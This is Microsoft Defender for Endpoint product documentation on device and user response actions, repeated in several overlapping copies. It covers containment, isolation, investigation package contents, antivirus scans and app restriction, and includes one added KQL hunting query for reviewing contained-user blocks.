contain a device, every Microsoft Defender for Endpoint onboarded device blocks
incoming and outgoing communication with that device. This action can help prevent
neighboring devices from becoming compromised while the security operations analyst
locates, identifies, and remediates the threat on the compromised device.

Note

Blocking incoming and outgoing communication with a 'contained' device is supported
on onboarded Microsoft Defender for Endpoint Windows 10 and Windows Server 2019+
devices.

How to contain a device

1. Go to the Device inventory page and select the device to contain.
2. Select Contain device from the actions menu in the device flyout.
3. On the contain device popup, type a comment, and select Confirm.

Contain a device from the device page

A device can also be contained from the device page by selecting Contain device from
the action bar:

Note

It can take up to 5 minutes for the details about a newly contained device to reach
Microsoft Defender for Endpoint onboarded devices.

Important

If a contained device changes its IP address, all Microsoft Defender for Endpoint onboarded devices recognize this and start blocking communications with the new IP address. The original IP address is no longer blocked (it may take up to 5 minutes to see these changes).
In cases where the contained device's IP is used by another device on the network, a warning is shown while containing the device, with a link to advanced hunting (with a pre-populated query). This provides visibility into the other devices using the same IP so that you can make an informed decision about whether to continue containing the device.
In cases where the contained device is a network device, a warning appears with a message that containment may cause network connectivity issues (for example, containing a router that is acting as the default gateway). At this point, you can choose whether to contain the device or not.

After you contain a device, if the behavior isn't as expected, verify the Base Filtering
Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.

Stop containing a device

You can stop containing a device at any time.

1. Select the device from the Device inventory or open the device page.
2. Select Release from containment from the action menu. This action restores the device's connection to the network.

Contain user from the network

When an identity in your network might be compromised, you must prevent that
identity from accessing the network and different endpoints. Defender for Endpoint can
"contain" an identity, blocking it from access and helping prevent attacks, specifically
ransomware. When an identity is contained, any supported Microsoft Defender for
Endpoint onboarded device blocks incoming traffic in specific protocols related to
attacks (network logons, RPC, SMB, RDP) while allowing legitimate traffic. This action
can significantly reduce the impact of an attack. When an identity is contained,
security operations analysts have extra time to locate, identify, and remediate the threat
to the compromised identity.

Note

Blocking incoming communication with a "contained" user is supported on onboarded
Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense version 8740 and
higher), Windows Server 2019+ devices, and Windows Server 2012 R2 and 2016 with
the modern agent.

How to contain a user

Currently, containing users is only available automatically by using automatic attack
disruption. When Microsoft detects a user as being compromised, a "Contain User"
policy is automatically set.

View the contain user actions

After a user is contained, you can view the action in the History view of the Action
center. Here, you can see when the action occurred, and which users in your
organization were contained.

Furthermore, after an identity is considered "contained", that user is blocked by
Defender for Endpoint and cannot perform any malicious lateral movement or remote
encryption on or to any supported Defender for Endpoint onboarded device. These
blocks show up as alerts to help you quickly see the devices the compromised user
attempted to access and the potential attack techniques.

Undo contain user actions

You can release the blocks and containment on a user at any time:

1. Select the Contain User action in the Action center. In the side pane, select Undo.
2. Alternatively, select the user from the user inventory, the Incident page side pane, or the alert side pane, and select Undo.

This action restores the user's connection to the network.

Investigation capabilities with Contain User

After a user is contained, you can investigate the potential threat by viewing the blocked
actions by the compromised user. In the Device timeline view, you can see information
about specific events, including protocol and interface granularity, and the relevant
MITRE technique associated with it.

In addition, you can expand the investigation by using Advanced Hunting. Look for any
"Action Type" starting with "Contain" in the "DeviceEvents" table. Then, you can view all
the different singular blocking events in relation to Contain User in your tenant, dive
deeper into the context of each block, and extract the different entities and techniques
associated with those events.
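A starting query for the Advanced Hunting step described above, added here as an illustration and not taken from the Microsoft documentation. It matches action types with startswith, as the article suggests, rather than hard-coding names, and it assumes the contained identity is reported in the AccountDomain/AccountName/AccountSid columns of DeviceEvents.

```kql
// Added example (not from the Microsoft documentation): scope of blocked activity
// attributed to contained users over the last 7 days.
// Assumption: the contained identity is reported in AccountDomain/AccountName/
// AccountSid; if your tenant's events carry it in AdditionalFields instead,
// parse that column and summarize on the relevant field.
let lookback = 7d;
DeviceEvents
| where Timestamp > ago(lookback)
| where ActionType startswith "Contain"
| summarize
    BlockedAttempts = count(),
    FirstSeen       = min(Timestamp),
    LastSeen        = max(Timestamp),
    ActionTypes     = make_set(ActionType, 20),   // which protocols/logon types were blocked
    TargetDevices   = make_set(DeviceName, 50),   // onboarded devices that enforced the block
    SourceIPs       = make_set(RemoteIP, 50)      // where the blocked traffic originated
    by AccountDomain, AccountName, AccountSid
| order by BlockedAttempts desc
```

Remove the summarize and project AdditionalFields instead to see the per-event protocol and interface detail mentioned above; since the blocks already surface as alerts, this view is for measuring scope and trend rather than initial detection.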

Consult a threat expert

You can consult a Microsoft threat expert for more insights regarding a potentially
compromised device or already compromised ones. Microsoft Threat Experts can be
engaged directly from within Microsoft Defender XDR for timely and accurate
response. Experts provide insights not just regarding a potentially compromised device,
but also to help you better understand complex threats, the targeted attack notifications
you receive, the alerts you need more information about, or the threat intelligence
context that you see on your portal dashboard.

See Consult a Microsoft Threat Expert for details.

Check activity details in Action center

The Action center provides information on actions that were taken on a device or file.
You can view the following details:

Investigation package collection
Antivirus scan
App restriction
Device isolation

All other related details are also shown, for example, submission date/time, submitting
user, and if the action succeeded or failed.

See also
Take response actions on a file
Manual response actions in Microsoft Defender for Endpoint Plan 1

Take response actions on a device
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2


Microsoft Defender for Business

) Important

Some information in this article relates to prereleased product which may be


substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Quickly respond to detected attacks by isolating devices or collecting an investigation


package. After taking action on devices, you can check activity details on the Action
center.

Response actions run along the top of a specific device page and include:

Manage tags
Initiate Automated Investigation
Initiate Live Response Session
Collect investigation package
Run antivirus scan
Restrict app execution
Isolate device
Contain device
Consult a threat expert
Action center

) Important

Defender for Endpoint Plan 1 includes only the following manual response actions:

Run antivirus scan


Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file.

Microsoft Defender for Business does not include the "Stop and quarantine a file"
action at this time.

Your subscription must include Defender for Endpoint Plan 2 to have all of the
response actions described in this article.

You can find device pages from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
queue.
Devices list - Select the heading of the device name from the devices list.
Search box - Select Device from the drop-down menu and enter the device name.

) Important

For information on availability and support for each response action, please refer to
the supported/minimum operating system requirements found under each feature.

Manage tags
Add or manage tags to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident.

For more information on device tagging, see Create and manage device tags.

Initiate Automated Investigation


You can start a new general purpose automated investigation on the device if needed.
While an investigation is running, any other alert generated from the device will be
added to an ongoing Automated investigation until that investigation is completed. In
addition, if the same threat is seen on other devices, those devices are added to the
investigation.

For more information on automated investigations, see Overview of Automated


investigations.
Initiate live response session
Live response is a capability that gives you instantaneous access to a device by using a
remote shell connection. This gives you the power to do in-depth investigative work and
take immediate response actions to promptly contain identified threats in real time.

Live response is designed to enhance investigations by enabling you to collect forensic


data, run scripts, send suspicious entities for analysis, remediate threats, and proactively
hunt for emerging threats.

For more information on live response, see Investigate entities on devices using live
response.

Collect investigation package from devices


As part of the investigation or response process, you can collect an investigation
package from a device. By collecting the investigation package, you can identify the
current state of the device and further understand the tools and techniques used by the
attacker.

To download the package (Zip file) and investigate the events that occurred on a device:

1. Select Collect investigation package from the row of response actions at the top
of the device page.

2. Specify in the text box why you want to perform this action. Select Confirm.

3. The zip file downloads.

Alternate steps:

1. Select Collect Investigation Package from the response actions section of the
device page.

2. Add comments and select Confirm.


3. Select Action center from the response actions section of the device page.

4. Click the Package collection package available to download the collection


package.

For Windows devices, the package contains the following folders:

ノ Expand table
Folder Description

Autoruns Contains a set of files that each represent the content of


the registry of a known auto start entry point (ASEP) to
help identify attacker's persistency on the device.

NOTE: If the registry key is not found, the file


will contain the following message: "ERROR:
The system was unable to find the specified
registry key or value."

Installed programs This .CSV file contains the list of installed programs that
can help identify what is currently installed on the device.
For more information, see Win32_Product class .

Network connections This folder contains a set of data points related to the
connectivity information that can help in identifying
connectivity to suspicious URLs, attacker's command and
control (C&C) infrastructure, any lateral movement, or
remote connections.
ActiveNetConnections.txt: Displays protocol
statistics and current TCP/IP network connections.
Provides the ability to look for suspicious
connectivity made by a process.
Arp.txt: Displays the current address resolution
protocol (ARP) cache tables for all interfaces. ARP
cache can reveal other hosts on a network that have
been compromised or suspicious systems on the
network that might have been used to run an
internal attack.
DnsCache.txt: Displays the contents of the DNS
client resolver cache, which includes both entries
preloaded from the local Hosts file and any recently
obtained resource records for name queries
resolved by the computer. This can help in
identifying suspicious connections.
IpConfig.txt: Displays the full TCP/IP configuration
for all adapters. Adapters can represent physical
interfaces, such as installed network adapters, or
logical interfaces, such as dial-up connections.
FirewallExecutionLog.txt and pfirewall.log

NOTE: The pfirewall.log file must exist in


%windir%\system32\logfiles\firewall\pfirewall.
log, so it will be included in the investigation
package. For more information on creating
Folder Description

the firewall log file, see Configure the


Windows Defender Firewall with Advanced
Security Log

Prefetch files Windows Prefetch files are designed to speed up the


application startup process. It can be used to track all the
files recently used in the system and find traces for
applications that might have been deleted but can still be
found in the prefetch file list.
Prefetch folder: Contains a copy of the prefetch files
from %SystemRoot%\Prefetch . NOTE: It is suggested
to download a prefetch file viewer to view the
prefetch files.
PrefetchFilesList.txt: Contains the list of all the
copied files that can be used to track if there were
any copy failures to the prefetch folder.

Processes Contains a .CSV file listing the running processes and


provides the ability to identify current processes running
on the device. This can be useful when identifying a
suspicious process and its state.

Scheduled tasks Contains a .CSV file listing the scheduled tasks, which can
be used to identify routines performed automatically on a
chosen device to look for suspicious code that was set to
run automatically.

Security event log Contains the security event log, which contains records of
login or logout activity, or other security-related events
specified by the system's audit policy.

NOTE: Open the event log file using Event


viewer.

Services Contains a .CSV file that lists services and their states.

Windows Server Message Lists shared access to files, printers, and serial ports and
Block (SMB) sessions miscellaneous communications between nodes on a
network. This can help identify data exfiltration or lateral
movement.
Contains files for SMBInboundSessions and
SMBOutboundSession.
Folder Description

NOTE: If there are no sessions (inbound or


outbound), you'll get a text file that tells you
that there are no SMB sessions found.

System Information Contains a SystemInformation.txt file that lists system


information such as OS version and network cards.

Temp Directories Contains a set of text files that lists the files located in
%Temp% for every user in the system.
This can help to track suspicious files that an attacker may
have dropped on the system.

NOTE: If the file contains the following


message: "The system cannot find the path
specified", it means that there is no temp
directory for this user, and might be because
the user didn't log in to the system.

Users and Groups Provides a list of files that each represent a group and its
members.

WdSupportLogs Provides the MpCmdRunLog.txt and MPSupportFiles.cab

NOTE: This folder will only be created on


Windows 10, version 1709 or later with
February 2020 update rollup or more recent
installed:

Win10 1709 (RS3) Build 16299.1717:


KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

CollectionSummaryReport.xls This file is a summary of the investigation package


collection, it contains the list of data points, the command
used to extract the data, the execution status, and the
Folder Description

error code if there is failure. You can use this report to


track if the package includes all the expected data and
identify if there were any errors.

The collection packages for macOS and Linux devices contain the following:

ノ Expand table

Object macOS Linux

Applications A list of all installed applications Not applicable

Disk volume Amount of free space Amount of free space


List of all mounted disk List of all mounted disk
volumes volumes
List of all partitions List of all partitions

File A list of all open files with the A list of all open files with the
corresponding processes using corresponding processes using
these files these files

History Shell history Not applicable

Kernel modules All loaded modules Not applicable

Network Active connections Active connections


connections Active listening connections Active listening connections
ARP table ARP table
Firewall rules Firewall rules
Interface configuration IP list
Proxy settings Proxy settings
VPN settings

Processes A list of all running processes A list of all running processes

Services and Certificates CPU details


scheduled tasks Configuration profiles Hardware information
Hardware information Operating system
information

System security Extensible Firmware Interface Not applicable


information (EFI) integrity information
Firewall status
Malware Removal Tool (MRT)
information
Object macOS Linux

System Integrity Protection


(SIP) status

Users and Login history Login history


groups Sudoers Sudoers

Run Microsoft Defender Antivirus scan on


devices
As part of the investigation or response process, you can remotely initiate an antivirus
scan to help identify and remediate malware that might be present on a compromised
device.

) Important

This action is supported for macOS and Linux for client version 101.98.84 and
above. You can also use live response to run the action. For more information
on live response, see Investigate entities on devices using live response
A Microsoft Defender Antivirus scan can run alongside other antivirus
solutions, whether Microsoft Defender Antivirus is the active antivirus solution
or not. Microsoft Defender Antivirus can be in Passive mode. For more
information, see Microsoft Defender Antivirus compatibility.

One you have selected Run antivirus scan, select the scan type that you'd like to run
(quick or full) and add a comment before confirming the scan.

The Action center will show the scan information and the device timeline will include a
new event, reflecting that a scan action was submitted on the device. Microsoft
Defender Antivirus alerts will reflect any detections that surfaced during the scan.

7 Note

When triggering a scan using Defender for Endpoint response action, Microsoft
Defender antivirus 'ScanAvgCPULoadFactor' value still applies and limits the CPU
impact of the scan. If ScanAvgCPULoadFactor is not configured, the default value is
a limit of 50% maximum CPU load during a scan. For more information, see
configure-advanced-scan-types-microsoft-defender-antivirus.

Restrict app execution


In addition to containing an attack by stopping malicious processes, you can also lock
down a device and prevent subsequent attempts of potentially malicious programs from
running.

) Important
This action is available for devices on Windows 10, version 1709 or later,
Windows 11, and Windows Server 2019 or later.
This feature is available if your organization uses Microsoft Defender Antivirus.
This action needs to meet the Windows Defender Application Control code
integrity policy formats and signing requirements. For more information, see
Code integrity policy formats and signing).

To restrict an application from running, a code integrity policy is applied that only allows
files to run if they are signed by a Microsoft issued certificate. This method of restriction
can help prevent an attacker from controlling compromised devices and performing
further malicious activities.

7 Note

You'll be able to reverse the restriction of applications from running at any time.
The button on the device page will change to say Remove app restrictions, and
then you take the same steps as restricting app execution.

Once you have selected Restrict app execution on the device page, type a comment
and select Confirm. The Action center will show the scan information and the device
timeline will include a new event.

Notification on device user


When an app is restricted, the following notification is displayed to inform the user that
an app is being restricted from running:

7 Note

The notification is not available on Windows Server 2016 and Windows Server 2012
R2.

Isolate devices from the network


Depending on the severity of the attack and the sensitivity of the device, you might
want to isolate the device from the network. This action can help prevent the attacker
from controlling the compromised device and performing further activities such as data
exfiltration and lateral movement.

) Important

Isolating devices from the network is supported for macOS for client version
101.98.84 and above. You can also use live response to run the action. For
more information on live response, see Investigate entities on devices using
live response
Full isolation is available for devices running Windows 11, Windows 10,
version 1703 or later, Windows Server 2022, Windows Server 2019, Windows
Server 2016 and Windows Server 2012 R2.
You can use the device isolation capability on all supported Microsoft
Defender for Endpoint on Linux listed in System requirements. Ensure that
the following prerequisites are enabled: iptables, ip6tables, and Linux kernel
with CONFIG_NETFILTER, CONFID_IP_NF_IPTABLES, and
CONFIG_IP_NF_MATCH_OWNER.
Selective isolation is available for devices running Windows 10, version 1709
or later, and Windows 11.
When isolating a device, only certain processes and destinations are allowed.
Therefore, devices that are behind a full VPN tunnel won't be able to reach
the Microsoft Defender for Endpoint cloud service after the device is isolated.
We recommend using a split-tunneling VPN for Microsoft Defender for
Endpoint and Microsoft Defender Antivirus cloud-based protection-related
traffic.
The feature supports VPN connection.
You must have at least one the following role permissions: 'Active remediation
actions'. For more information, see Create and manage roles.
You must have access to the device based on the device group settings. For
more information, see Create and manage device groups.
Exclusion for both macOS and Linux isolation is not supported.
An isolated device is removed from isolation when an administrator modifies
or adds a new iptable rule to the isolated device.
Isolating a server running on Microsoft Hyper-V blocks network traffic to all
child virtual machines of the server.

This device isolation feature disconnects the compromised device from the network
while retaining connectivity to the Defender for Endpoint service, which continues to
monitor the device.

On Windows 10, version 1709 or later, you'll have more control over the network
isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for
Business connectivity (a.k.a 'Selective Isolation').

7 Note

You'll be able to reconnect the device back to the network at any time. The button
on the device page will change to say Release from isolation, and then you take
the same steps as isolating the device.

Once you have selected Isolate device on the device page, type a comment and select
Confirm. The Action center will show the scan information and the device timeline will
include a new event.

7 Note

The device will remain connected to the Defender for Endpoint service even if it is
isolated from the network. If you've chosen to enable Outlook and Skype for
Business communication, then you'll be able to communicate to the user while the
device is isolated. Selective isolation only works on the classic versions of Outlook
and Microsoft Teams.

Forcibly release device from isolation


The device isolation feature is an invaluable tool for safeguarding devices against
external threats. However, there are instances when isolated devices become
unresponsive.
There's a downloadable script for these instances that you can run to forcibly release
devices from isolation. The script is available through a link in the UI.

7 Note

Admins and manage security settings in Security Center permissions can


forcibly release devices from isolation.
The script is valid for the specific device only.
The script will expire in three days.

To forcibly release device from isolation:

1. On the device page, select Download script to force-release a device from


isolation from the action menu.
2. On the right-hand side wizard, select Download script.

Minimum requirements
The minimum requirements for 'forcibly release device from isolation' feature are:

Supports only Windows


The following Windows versions are supported:
Windows 10 21H2 and 22H2 with KB KB5023773
Windows 11 version 21H2, all editions with KB5023774
Windows 11 version 22H2, all editions with KB5023778

Notification on device user


When a device is being isolated, the following notification is displayed to inform the
user that the device is being isolated from the network:

7 Note

The notification is not available on non-Windows platforms.

Contain devices from the network


When you have identified an unmanaged device that is compromised or potentially
compromised, you might want to contain that device from the network. When you
contain a device any Microsoft Defender for Endpoint onboarded device will block
incoming and outgoing communication with that device. This action can help prevent
neighboring devices from becoming compromised while the security operations analyst
locates, identifies, and remediates the threat on the compromised device.

7 Note

Blocking incoming and outgoing communication with a 'contained' device is


supported on onboarded Microsoft Defender for Endpoint Windows 10 and
Windows Server 2019+ devices.

How to contain a device


1. Go to the Device inventory page and select the device to contain.

2. Select Contain device from the actions menu in the device flyout.

3. On the contain device popup, type a comment, and select Confirm.


Contain a device from the device page


A device can also be contained from the device page by selecting Contain device from
the action bar:

7 Note
It can take up to 5 minutes for the details about a newly contained device to reach
Microsoft Defender for Endpoint onboarded devices.

) Important

If a contained device changes its IP address, then all Microsoft Defender for
Endpoint onboarded devices will recognize this and start blocking
communications with the new IP address. The original IP address will no
longer be blocked (It may take up to 5 mins to see these changes).
In cases where the contained device's IP is used by another device on the
network, there will be a warning while containing the device, with a link to
advanced hunting (with a pre-populated query). This will provide visibility to
the other devices using the same IP to help you make a conscious decision if
you'd like to continue with containing the device.
In cases where the contained device is a network device, a warning will appear
with a message that this may cause network connectivity issues (for example,
containing a router that is acting as a default gateway). At this point, you'll be
able to choose whether to contain the device or not.

After you contain a device, if the behavior isn't as expected, verify the Base Filtering
Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.

Stop containing a device


You'll be able to stop containing a device at any time.

1. Select the device from the Device inventory or open the device page.

2. Select Release from containment from the action menu. This action will restore
this device's connection to the network.

Contain user from the network


When an identity in your network might be compromised, you must prevent that
identity from accessing the network and different endpoints. Defender for Endpoint can
"contain" an identity, blocking it from access, and helping prevent attacks-- specifically,
ransomware. When an identity is contained, any supported Microsoft Defender for
Endpoint onboarded device will block incoming traffic in specific protocols related to
attacks (network logons, RPC, SMB, RDP) while enabling legitimate traffic. This action
can significantly help to reduce the impact of an attack. When an identity is contained,
security operations analysts have extra time to locate, identify and remediate the threat
to the compromised identity.

7 Note

Blocking incoming communication with a "contained" user is supported on


onboarded Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense
version 8740 and higher), Windows Server 2019+ devices, and Windows Servers
2012R2 and 2016 with the modern agent.

How to contain a user


Currently, containing users is only available automatically by using automatic attack
disruption. When Microsoft detects a user as being compromised a "Contain User"
policy is automatically set.

View the contain user actions


After a user is contained, you can view the action in this History view of the Action
Center. Here, you can see when the action occurred, and which users in your
organization were contained:

Furthermore, after an identity is considered "contained", that user will be blocked by


Defender for Endpoint and cannot perform any malicious lateral movement or remote
encryption on or to any supported Defender for Endpoint onboarded device. These
blocks will show up as alerts to help you quickly see the devices the compromised user
attempted access and potential attack techniques:

Undo contain user actions


You can release the blocks and containment on a user at any time:

1. Select the Contain User action in the Action Center. In the side pane select Undo
2. Select the user from either the user inventory, Incident page side pane or alert side
pane and select Undo

This action will restore this user's connection to the network.

Investigation capabilities with Contain User

After a user is contained, you can investigate the potential threat by viewing the blocked actions by the compromised user. In the Device timeline view, you can see information about specific events, including protocol and interface granularity, and the relevant MITRE technique associated with it.

In addition, you can expand the investigation by using Advanced Hunting. Look for any
"Action Type" starting with "Contain" in the "DeviceEvents" table. Then, you can view all
the different singular blocking events in relation to Contain User in your tenant, dive
deeper into the context of each block, and extract the different entities and techniques
associated with those events.

Consult a threat expert

You can consult a Microsoft threat expert for more insights regarding a potentially compromised device, or devices that are already compromised. Microsoft Threat Experts can be engaged directly from within Microsoft Defender XDR for timely and accurate response. Experts provide insights not just regarding a potentially compromised device, but also to help you better understand complex threats, the targeted attack notifications that you get, the alerts, or the threat intelligence context that you see on your portal dashboard.

See Consult a Microsoft Threat Expert for details.

Check activity details in Action center

The Action center provides information on actions that were taken on a device or file. You'll be able to view the following details:

Investigation package collection
Antivirus scan
App restriction
Device isolation

All other related details are also shown, for example, submission date/time, submitting user, and whether the action succeeded or failed.

See also
Take response actions on a file
Manual response actions in Microsoft Defender for Endpoint Plan 1

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Take response actions on a device
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2
Microsoft Defender for Business

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Quickly respond to detected attacks by isolating devices or collecting an investigation package. After taking action on devices, you can check activity details in the Action center.

Response actions run along the top of a specific device page and include:

Manage tags
Initiate Automated Investigation
Initiate Live Response Session
Collect investigation package
Run antivirus scan
Restrict app execution
Isolate device
Contain device
Consult a threat expert
Action center

Important

Defender for Endpoint Plan 1 includes only the following manual response actions:

Run antivirus scan
Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file

Microsoft Defender for Business does not include the "Stop and quarantine a file" action at this time.

Your subscription must include Defender for Endpoint Plan 2 to have all of the response actions described in this article.

You can find device pages from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
queue.
Devices list - Select the heading of the device name from the devices list.
Search box - Select Device from the drop-down menu and enter the device name.

Important

For information on availability and support for each response action, please refer to
the supported/minimum operating system requirements found under each feature.

Manage tags
Add or manage tags to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident.

For more information on device tagging, see Create and manage device tags.

Initiate Automated Investigation

You can start a new general-purpose automated investigation on the device if needed. While an investigation is running, any other alert generated from the device is added to the ongoing automated investigation until that investigation is completed. In addition, if the same threat is seen on other devices, those devices are added to the investigation.

For more information on automated investigations, see Overview of Automated investigations.

Initiate live response session

Live response is a capability that gives you instantaneous access to a device by using a remote shell connection. This gives you the power to do in-depth investigative work and take immediate response actions to promptly contain identified threats in real time.

Live response is designed to enhance investigations by enabling you to collect forensic data, run scripts, send suspicious entities for analysis, remediate threats, and proactively hunt for emerging threats.

For more information on live response, see Investigate entities on devices using live response.

Collect investigation package from devices

As part of the investigation or response process, you can collect an investigation package from a device. By collecting the investigation package, you can identify the current state of the device and further understand the tools and techniques used by the attacker.

To download the package (Zip file) and investigate the events that occurred on a device:

1. Select Collect investigation package from the row of response actions at the top of the device page.

2. Specify in the text box why you want to perform this action. Select Confirm.

3. The zip file downloads.

Alternate steps:

1. Select Collect Investigation Package from the response actions section of the device page.

2. Add comments and select Confirm.

3. Select Action center from the response actions section of the device page.

4. Select the Package collection package that is listed as available for download, to download the collection package.

For Windows devices, the package contains the following folders:

Autoruns
    Contains a set of files that each represent the content of the registry of a known auto start entry point (ASEP) to help identify the attacker's persistence on the device.
    NOTE: If the registry key is not found, the file will contain the following message: "ERROR: The system was unable to find the specified registry key or value."

Installed programs
    This .CSV file contains the list of installed programs that can help identify what is currently installed on the device. For more information, see Win32_Product class.

Network connections
    This folder contains a set of data points related to the connectivity information that can help in identifying connectivity to suspicious URLs, the attacker's command and control (C&C) infrastructure, any lateral movement, or remote connections.
    ActiveNetConnections.txt: Displays protocol statistics and current TCP/IP network connections. Provides the ability to look for suspicious connectivity made by a process.
    Arp.txt: Displays the current address resolution protocol (ARP) cache tables for all interfaces. The ARP cache can reveal other hosts on a network that have been compromised, or suspicious systems on the network that might have been used to run an internal attack.
    DnsCache.txt: Displays the contents of the DNS client resolver cache, which includes both entries preloaded from the local Hosts file and any recently obtained resource records for name queries resolved by the computer. This can help in identifying suspicious connections.
    IpConfig.txt: Displays the full TCP/IP configuration for all adapters. Adapters can represent physical interfaces, such as installed network adapters, or logical interfaces, such as dial-up connections.
    FirewallExecutionLog.txt and pfirewall.log
    NOTE: The pfirewall.log file must exist in %windir%\system32\logfiles\firewall\pfirewall.log so that it will be included in the investigation package. For more information on creating the firewall log file, see Configure the Windows Defender Firewall with Advanced Security Log.

Prefetch files
    Windows Prefetch files are designed to speed up the application startup process. They can be used to track all the files recently used in the system and find traces of applications that might have been deleted but can still be found in the prefetch file list.
    Prefetch folder: Contains a copy of the prefetch files from %SystemRoot%\Prefetch. NOTE: It is suggested to download a prefetch file viewer to view the prefetch files.
    PrefetchFilesList.txt: Contains the list of all the copied files, which can be used to track whether there were any copy failures to the prefetch folder.

Processes
    Contains a .CSV file listing the running processes and provides the ability to identify the current processes running on the device. This can be useful when identifying a suspicious process and its state.

Scheduled tasks
    Contains a .CSV file listing the scheduled tasks, which can be used to identify routines performed automatically on a chosen device to look for suspicious code that was set to run automatically.

Security event log
    Contains the security event log, which contains records of login or logout activity, or other security-related events specified by the system's audit policy.
    NOTE: Open the event log file using Event Viewer.

Services
    Contains a .CSV file that lists services and their states.

Windows Server Message Block (SMB) sessions
    Lists shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network. This can help identify data exfiltration or lateral movement.
    Contains files for SMBInboundSessions and SMBOutboundSession.
    NOTE: If there are no sessions (inbound or outbound), you'll get a text file that tells you that there are no SMB sessions found.

System Information
    Contains a SystemInformation.txt file that lists system information such as OS version and network cards.

Temp Directories
    Contains a set of text files that list the files located in %Temp% for every user in the system. This can help to track suspicious files that an attacker may have dropped on the system.
    NOTE: If the file contains the following message: "The system cannot find the path specified", it means that there is no temp directory for this user, which might be because the user didn't log in to the system.

Users and Groups
    Provides a list of files that each represent a group and its members.

WdSupportLogs
    Provides the MpCmdRunLog.txt and MPSupportFiles.cab.
    NOTE: This folder will only be created on Windows 10, version 1709 or later with the February 2020 update rollup or more recent installed:
    Win10 1709 (RS3) Build 16299.1717: KB4537816
    Win10 1803 (RS4) Build 17134.1345: KB4537795
    Win10 1809 (RS5) Build 17763.1075: KB4537818
    Win10 1903/1909 (19h1/19h2) Builds 18362.693 and 18363.693: KB4535996

CollectionSummaryReport.xls
    This file is a summary of the investigation package collection. It contains the list of data points, the command used to extract the data, the execution status, and the error code if there is a failure. You can use this report to track whether the package includes all the expected data and identify whether there were any errors.

The collection packages for macOS and Linux devices contain the following:

Applications
    macOS: A list of all installed applications
    Linux: Not applicable

Disk volume
    macOS: Amount of free space; list of all mounted disk volumes; list of all partitions
    Linux: Amount of free space; list of all mounted disk volumes; list of all partitions

File
    macOS: A list of all open files with the corresponding processes using these files
    Linux: A list of all open files with the corresponding processes using these files

History
    macOS: Shell history
    Linux: Not applicable

Kernel modules
    macOS: All loaded modules
    Linux: Not applicable

Network connections
    macOS: Active connections; active listening connections; ARP table; firewall rules; interface configuration; proxy settings; VPN settings
    Linux: Active connections; active listening connections; ARP table; firewall rules; IP list; proxy settings

Processes
    macOS: A list of all running processes
    Linux: A list of all running processes

Services and scheduled tasks
    macOS: Certificates; configuration profiles; hardware information
    Linux: CPU details; hardware information; operating system information

System security information
    macOS: Extensible Firmware Interface (EFI) integrity information; firewall status; Malware Removal Tool (MRT) information; System Integrity Protection (SIP) status
    Linux: Not applicable

Users and groups
    macOS: Login history; sudoers
    Linux: Login history; sudoers

Run Microsoft Defender Antivirus scan on devices

As part of the investigation or response process, you can remotely initiate an antivirus scan to help identify and remediate malware that might be present on a compromised device.

Important

This action is supported for macOS and Linux for client version 101.98.84 and above. You can also use live response to run the action. For more information on live response, see Investigate entities on devices using live response.
A Microsoft Defender Antivirus scan can run alongside other antivirus solutions, whether Microsoft Defender Antivirus is the active antivirus solution or not. Microsoft Defender Antivirus can be in Passive mode. For more information, see Microsoft Defender Antivirus compatibility.

Once you have selected Run antivirus scan, select the scan type that you'd like to run (quick or full) and add a comment before confirming the scan.

The Action center shows the scan information, and the device timeline includes a new event reflecting that a scan action was submitted on the device. Microsoft Defender Antivirus alerts reflect any detections that surfaced during the scan.

Note

When triggering a scan using a Defender for Endpoint response action, the Microsoft Defender Antivirus 'ScanAvgCPULoadFactor' value still applies and limits the CPU impact of the scan. If ScanAvgCPULoadFactor is not configured, the default value is a limit of 50% maximum CPU load during a scan. For more information, see configure-advanced-scan-types-microsoft-defender-antivirus.

Restrict app execution

In addition to containing an attack by stopping malicious processes, you can also lock down a device and prevent subsequent attempts by potentially malicious programs to run.

Important

This action is available for devices on Windows 10, version 1709 or later, Windows 11, and Windows Server 2019 or later.
This feature is available if your organization uses Microsoft Defender Antivirus.
This action needs to meet the Windows Defender Application Control code integrity policy formats and signing requirements. For more information, see Code integrity policy formats and signing.

To restrict an application from running, a code integrity policy is applied that only allows files to run if they are signed by a Microsoft-issued certificate. This method of restriction can help prevent an attacker from controlling compromised devices and performing further malicious activities.

Note

You'll be able to reverse the restriction of applications from running at any time. The button on the device page changes to say Remove app restrictions, and then you take the same steps as for restricting app execution.

Once you have selected Restrict app execution on the device page, type a comment and select Confirm. The Action center shows the scan information, and the device timeline includes a new event.

Notification on device user

When an app is restricted, the following notification is displayed to inform the user that an app is being restricted from running.

Note

The notification is not available on Windows Server 2016 and Windows Server 2012 R2.

Isolate devices from the network

Depending on the severity of the attack and the sensitivity of the device, you might want to isolate the device from the network. This action can help prevent the attacker from controlling the compromised device and performing further activities such as data exfiltration and lateral movement.

Important

Isolating devices from the network is supported for macOS for client version 101.98.84 and above. You can also use live response to run the action. For more information on live response, see Investigate entities on devices using live response.
Full isolation is available for devices running Windows 11, Windows 10, version 1703 or later, Windows Server 2022, Windows Server 2019, Windows Server 2016, and Windows Server 2012 R2.
